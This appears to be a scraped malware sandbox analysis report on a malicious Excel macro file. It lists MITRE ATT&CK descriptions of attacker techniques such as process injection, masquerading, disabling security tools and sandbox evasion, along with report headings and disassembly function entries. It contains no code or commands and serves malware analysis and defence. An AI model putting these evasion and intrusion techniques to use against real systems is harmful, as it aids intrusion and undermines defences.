Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report request_form_1611565093.xlsm

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "request_form_1611565093.xlsm"

Indicators

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Function 00007FF7645C2AF0, Relevance: 2.0, APIs: 1, Instructions: 544
COMMON

Function 00007FF764607E74, Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Function 00007FF764607FE0, Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Function 00007FF7645B8800, Relevance: 17.0, APIs: 8, Strings: 3, Instructions: 483
COMMON

Function 00007FF7645B9C00, Relevance: 10.3, Strings: 8, Instructions: 290
COMMON

Function 00007FF764607818, Relevance: 9.1, APIs: 6, Instructions: 83
COMMONLIBRARYCODE

Function 00007FF7645BB780, Relevance: 7.6, Strings: 6, Instructions: 131
COMMON

Function 00007FF7645B7350, Relevance: 6.8, Strings: 5, Instructions: 566
COMMON

Function 00007FF7645B32A0, Relevance: 6.7, Strings: 5, Instructions: 430
COMMON

Function 00007FF7645B9040, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 185
COMMON